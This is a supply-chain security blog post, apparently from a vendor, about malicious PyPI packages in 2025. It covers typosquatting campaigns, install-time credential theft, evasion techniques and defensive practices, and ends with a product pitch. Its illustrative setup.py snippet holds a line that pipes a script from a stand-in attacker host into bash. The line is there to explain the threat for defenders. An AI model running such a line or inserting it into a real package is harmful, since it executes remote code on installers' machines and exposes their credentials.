Supply Chain Security

PyPI Malicious Packages 2025: Python's Growing Supply Chain Problem

PyPI faced a surge of malicious package uploads in early 2025, targeting data science, AI/ML, and cloud development workflows. Here's the full picture.

Michael
Threat Intelligence
6 min read

The Python Package Index (PyPI) — the primary repository for Python packages with over 500,000 projects — saw a significant escalation in malicious package campaigns through early 2025. Security researchers from multiple firms identified coordinated upload campaigns targeting Python developers working in data science, machine learning, cloud infrastructure, and cryptocurrency development.

Python's dominance in AI/ML development has made PyPI an increasingly attractive target. When every data scientist and ML engineer runs pip install dozens of times a day, the probability of someone installing a malicious package through typosquatting or social engineering grows proportionally.

Scale of the Problem

In the first quarter of 2025:

  • Over 500 malicious packages were identified and removed from PyPI
  • Multiple coordinated campaigns targeted specific developer communities
  • AI/ML-themed packages accounted for approximately 30% of malicious uploads
  • Credential theft remained the primary payload objective
  • Cloud infrastructure targeting increased significantly, with packages designed to steal AWS, GCP, and Azure credentials

PyPI's volunteer-staffed moderation team, supported by automated scanning, removed packages as quickly as they were identified. But the time between upload and removal — the exposure window — ranged from hours to days, during which vulnerable developers could download and install the malicious code.

Attack Campaigns

AI/ML typosquatting wave

The explosive growth of Python AI/ML libraries created fertile ground for typosquatting. Packages mimicking popular libraries were uploaded with names like:

  • Variants of transformers, pytorch, tensorflow, and scikit-learn
  • Fake "helper" or "utils" packages for popular AI frameworks
  • Packages claiming to provide GPU optimization or model quantization utilities

These targeted a developer demographic that often works in environments with elevated privileges — accessing training data, cloud compute resources, and model repositories. The payloads focused on stealing:

  • Hugging Face API tokens
  • Cloud provider credentials
  • SSH keys used for cluster access
  • Weights & Biases and MLflow credentials

Cloud development targeting

Packages designed to intercept cloud infrastructure credentials:

  • Typosquats of boto3 (AWS SDK), google-cloud-* packages, and azure-* packages
  • Fake infrastructure-as-code helper libraries
  • Packages impersonating internal tooling names discovered through GitHub reconnaissance

The payloads exfiltrated credentials and in some cases deployed persistent backdoors that survived beyond the initial Python session.

Cryptocurrency library impersonation

Fake packages targeting cryptocurrency developers:

  • Wallet library impersonations that intercepted private keys
  • Exchange API wrappers that modified transaction recipients
  • DeFi development tools that included key-logging functionality

Given that cryptocurrency transactions are irreversible, these attacks had immediate, unrecoverable financial impact on victims.

Technical Techniques

setup.py exploitation

Python's setup.py runs arbitrary code during package installation. Malicious packages use this to execute payloads before the developer even imports the package:

from setuptools import setup
import os
os.system("curl -s https://attacker.com/payload.sh | bash")
setup(name="legitimate-looking-name", ...)

The code runs with the installer's permissions, which in many development environments includes access to cloud credentials, SSH keys, and CI/CD secrets.

Conditional execution

Sophisticated packages check their environment before executing payloads:

  • Detecting CI/CD environments (checking for CI, GITHUB_ACTIONS, JENKINS_URL variables)
  • Targeting specific operating systems
  • Checking for the presence of specific tools or files that indicate high-value targets
  • Delaying execution to evade sandbox analysis

Steganographic payloads

Some packages embedded malicious code within seemingly legitimate data files — images, model weights, or configuration files included in the package. The setup script would extract and execute the hidden payload, bypassing static analysis that only examines Python source files.

Dependency chain poisoning

Rather than making the malicious package itself suspicious, some campaigns created chains of packages where:

  1. Package A appears clean and provides useful functionality
  2. Package A depends on Package B, which also appears clean
  3. Package B depends on Package C, which contains the malicious payload

This multi-layer approach makes detection harder because each individual package may not trigger security alerts.

PyPI's Defensive Evolution

PyPI has implemented several security improvements:

  • Mandatory 2FA for critical project maintainers
  • Trusted Publishers using OpenID Connect for automated publishing from CI/CD
  • Malware detection scanning using pattern matching and behavioral analysis
  • Rate limiting on new package registrations
  • Package provenance through Sigstore integration

These measures have raised the bar for attackers but haven't eliminated the problem. The fundamental challenge is that PyPI is a public repository that accepts uploads from anyone, and the volume of legitimate uploads makes manual review impossible.

Defensive Strategies for Python Developers

Virtual environments always

Never install packages into your system Python. Use virtual environments (venv, conda, poetry) for every project. This limits the blast radius of a malicious package to the project environment rather than your entire system.

Pin dependencies and use hash verification

Use pip install --require-hashes with pinned versions in your requirements files. This ensures that the exact package contents you've reviewed are what gets installed.

requests==2.31.0 --hash=sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003eb

Audit new dependencies

Before adding a new dependency:

  • Check the package's age, download count, and maintainer history
  • Review the source code, especially setup.py and __init__.py
  • Check for install-time execution hooks
  • Verify the package on PyPI matches what's on GitHub

Use dependency scanning tools

Integrate automated dependency scanning into your development workflow:

  • PyPI advisory database checks
  • Commercial tools (Snyk, Socket.dev, Phylum)
  • Open source options (pip-audit, safety)
  • SBOM generation for all Python projects

Private package index

For organizations with internal packages, use a private package index (Artifactory, Nexus, devpi) configured as the primary source. This prevents dependency confusion attacks and allows pre-screening of external packages.

How Safeguard.sh Helps

Safeguard.sh provides comprehensive Python supply chain security through automated SBOM generation and continuous dependency monitoring. The platform tracks every Python package in your projects — direct dependencies and the full transitive tree — and correlates them against known vulnerability databases and malicious package feeds.

When a new malicious PyPI package is identified, Safeguard.sh immediately checks your entire organization's Python dependency trees for exposure. This is critical for large organizations with hundreds of Python projects where manual auditing is impossible.

The platform's policy engine can enforce Python-specific security standards: requiring hash verification, flagging packages with install-time scripts, alerting on new dependencies, and blocking packages that match known malicious patterns. For AI/ML teams working with rapidly evolving dependency stacks, Safeguard.sh provides the automated oversight that prevents supply chain compromises from reaching production.

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.